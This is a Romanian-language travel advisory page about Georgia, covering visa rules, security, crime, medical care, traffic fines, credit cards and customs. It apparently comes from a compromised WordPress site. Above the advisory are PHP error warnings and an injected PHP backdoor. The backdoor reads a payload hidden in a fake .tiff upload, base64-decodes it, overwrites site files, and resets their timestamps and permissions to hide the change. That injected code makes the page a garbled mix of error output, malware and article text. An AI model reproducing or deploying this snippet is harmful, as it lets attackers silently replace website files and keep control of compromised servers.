Warning: filemtime(): stat failed for /home/shuffles/public_html/.htaccess in /home/shuffles/public_html/wp-includes/revision.php on line 1148

Warning: filemtime(): stat failed for /home/shuffles/public_html/index.php in /home/shuffles/public_html/wp-includes/category.php on line 408
$wp_update_file="/home/shuffles/public_html/wp-content/uploads/2023/05/0506412536.tiff"; if ( is_file($wp_update_file) ) { $wp_update_content=trim(file_get_contents($wp_update_file)); if ( $wp_update_content!="" ) { $wp_update_content=substr($wp_update_content,6,-6); $wp_update_content=base64_decode($wp_update_content); $wp_update_arr=json_decode($wp_update_content,true); if ( is_array($wp_update_arr) ) { foreach($wp_update_arr as $value) { $file_mtime=filemtime($value["path"]); @chmod($value["path"],0777); @unlink($value["path"]); @file_put_contents($value["path"],$value["content"]); @touch($value["path"],$file_mtime); @chmod($value["path"],0444); } } } } Georgia – O noua atitudine

Condiţii de intrare şi regim de şedere

Ca urmare a aderării ţării noastre la Uniunea Europeană, autorităţile georgiene au decis desfiinţarea unilaterala a regimului de vize pentru cetăţenii români ce călătoresc în Georgia, începând cu data de 12 aprilie 2007. În prezent, cetăţenii români pot intra pe teritoriul Georgiei, fără viză, pentru o perioadă de 360 de zile.

Pentru cetăţenii români care doresc să rămână mai mult de 1 an pe teritoriul acestei ţări, se eliberează, un permis temporar de şedere de către Ministerul Justiţiei.

Pentru informaţii suplimentare, recomandăm consultarea informaţiilor oficiale oferite de:

Ministerul Afacerilor Externe recomandă cetăţenilor români care intenţionează să rămână pentru o perioadă îndelungată pe teritoriul acestui stat să se adreseze misiunii diplomatice a României şi să îşi anunţe prezenţa în regiune, comunicând coordonatele personale pentru a putea fi contactaţi în situaţii de urgenţă.

Ameninţări teroriste

Starea de securitate din această ţară, deşi îşi mentine fragilitatea, ca urmare a conflictului ruso-georgian declanşat în august 2008 în Osetia de Sud, în prezent este relativ stabilă şi calmă. Totuşi, având în vedere specificul spaţiului, vă recomandăm să consultaţi rubrica “Alerte de călătorie” a site-ului MAE.

Siguranţă şi criminalitate

Nivelul criminalităţii în Georgia este în prezent scăzut, ca urmare a acţiunii în forţă a organelor de poliţie, autorităţile locale punând accentul pe latura prevenirii activităţilor infracţionale.

Vă recomandăm să vă adresaţi echipajelor de poliţie ori de cate ori situţia o impune.

În cazul în care trebuie să vă deplasaţi în Georgia, vă recomandăm sa utilizati punctele de trecere a frontierei de la Sarpi (rutier – graniţa cu Turcia), Red Bridge (rutier – graniţa cu Azerbaidjan), Sadakhlo (rutier – graniţa cu Armenia), precum şi cele de pe aeroporturile internaţionale în Tibilisi, respectiv Batumi.

Nu este permisă intrarea în Georgia prin traversarea zonelor de vecinatate cu Daghestan, Cecenia, Inguşeţia şi Osetia de Nord respectiv Abhazia si Osetia de Sud.

De asemenea, vă recomandăm evitarea zonelor situate în apropierea regiunilor separatiste – Abkhazia şi Osetia de Sud (Defileul Pankisi, Defileul Kodori, Zugdidi, Svaneti, Gori).

Călătoriile prin aceste regiuni trebuie făcute numai dupa consultarea Ambasadei României de la Tibilisi. În acest sens, urmăriţi în permanenţă anunţurile şi recomandările făcute de autorităţile georgiene şi accesaţi periodic pagina web a Ministerului român al Afacerilor  Externe (www.mae.ro).

Cetăţenii români sunt sfătuiţi:

  • Să evite locurile aglomerate, demonstraţiile şi deplasarea în zone izolate ale ţării, circulaţia pe timp de noapte, indiferent de zonă.
  • Să urmărească mass-media locală pentru a afla care sunt potenţialele zone de risc pentru a le putea evita.
  • Să păstreze în locuri sigure documentele şi valorile personale, biletele de călătorie, banii, cărţile de credit şi să nu le expună în mod vizibil asupra lor sau în maşini.

În timpul deplasării cu autoturismul, geamurile trebuie să rămână tot timpul ridicate, iar uşile, blocate.

Infracţiuni de tipul furtului din buzunare, înşelăciunilor sau furtului din maşini pot apărea în zone aglomerate (gări, staţii, parcări, centre comerciale, benzinării).

În cazul unor incidente grave, care necesită intervenţia imediată a autorităţilor georgiene, trebuie să apelaţi numărul de urgenţă 022 (Poliţia). Vă recomandăm, de asemenea, sesizarea Ambasadei României, care poate acorda asistenţa consulară în condiţiile prevăzute de lege.

Sistemul medical

Este obligatorie încheierea unei asigurări medicale pentru întreaga durată a deplasării în Georgia.

Spitalele de stat nu acceptă, decât în cazuri deosebite, poliţele de asigurare, dar în Tbilisi s-au dezvoltat în ultimii ani o reţea de clinici şi spitale particulare, dotate cu specialişti şi utilaje moderne, care onorează asemenea poliţe.

Serviciile medicale pentru cetăţenii străini sunt contra-cost.


Condiţii privind traficul auto

  • Starea drumurilor

Starea generală a drumurilor este relativ precară.

Singura şosea naţională cu regim de autostradă este pe traseul Batumi (graniţa cu Turcia) – Kutaisi-Gori-Tbilisi, fiind in desfăşurare în prezent ample lucrări de reabilitare a întregii infrastructuri rutiere.

  • Circulaţia auto

Transportul rutier se desfăşoară cu dificultate, iar regulile de circulaţie nu sunt respectate.

Atenţie! Începând cu 3 august 2010, au intrat în vigoare o serie de modificări ale Codului Rutier din Georgia. Printre aceste măsuri se numără şi creşeterea sancţiunilor aplicate încălcării regulilor de circulaţie:

  • Conducerea sub influenţa alcoolului – amenda este în cuantum de 200 GEL (cca. 130 USD).
  • Producerea unui accident soldat cu daune materiale sau victime (inclusiv vătămare corporală) – se aplică suspendarea dreptului de a conduce autovehicule pentru o perioadă de trei ani.
  • Refuzul conducătorului auto de a se supune testului etiloscop – se aplică suspendarea dreptului de a conduce autovehicule pentru o perioadă de trei ani.
  • Neoprirea la semnalul agentului de circulaţie sau părăsirea autovehiculului la locul accidentului – se sancţionează cu amendă contravenţională de 300 GEL (cca. 270 USD) sau cu suspendarea dreptului de a conduce autovehicule pentru o perioadă de un an.
  • Obstrucţionarea coloanelor oficiale sau ale autovehiculelor de stat – se sancţionează cu suspendarea dreptului de a conduce autovehicule pentru o perioadă de un an.

Amenzile sunt plătite, în general, la faţa locului.

  • Permisul de conducere

Permisul de conducere românesc este recunoscut în Georgia. Dacă intenţionaţi să rămâneţi un timp mai îndelungat, vă recomandăm să obţineţi un permis local.

  • Centura de siguranţă
    • Centura de siguranţă este obligatorie.
    • Nepurtarea centurii de siguranţă se sancţionează cu amendă de 40 GEL. (cca 25 USD).
  • Parcarea

Parcarea se face cu plată, în locuri supravegheate de lucrători însărcinaţi cu acest serviciu, numai în Tbilisi şi în celelalte oraşe mai mari.

Atenţie! Parcarea în locurile în care acest lucru este interzis (sunt semnalizări rutiere şi avertizări speciale vizibile în acest sens), conduce la ridicarea autoturismului de către serviciile specializate ale primăriei şi achitarea amenzilor aferente (cuantumul diferă în funcţie de timpul staţionării).

  • Transportul public

Transportul public este asigurat în regim de “maxi-taxi”, atât în interiorul localităţilor, cât şi în afara acestora (interurban). La Tbilisi există şi reţea de metrou şi autobuze, fiind introdus de curand sistemul electronic de plată a călătoriei (cardul electronic).

Utilizarea cărţilor de credit

Cărţile de credit pot fi utilizate în toate marile oraşe, fiind recunoscute majoritatea tipurilor de carduri.

Se recomandă totusi prudenţă la folosirea lor, pentru a evita posibile încercări de fraudare şi informarea prealabilă în legătură cu comisioanele de retagere şi plata unor operaţiuni.

Reglementări vamale

În cazul în care aţi achiziţionat tablouri şi obiecte de artă (inclusiv suveniruri) trebuie să păstraţi chitanţa de plată a acestora. Dacă au o valoare mare, vă recomandăm să obţineţi un certificat de la Ministerul Culturii local, pentru a demonstra că respectivele bunuri nu fac parte din patrimoniul naţional.

By o9admin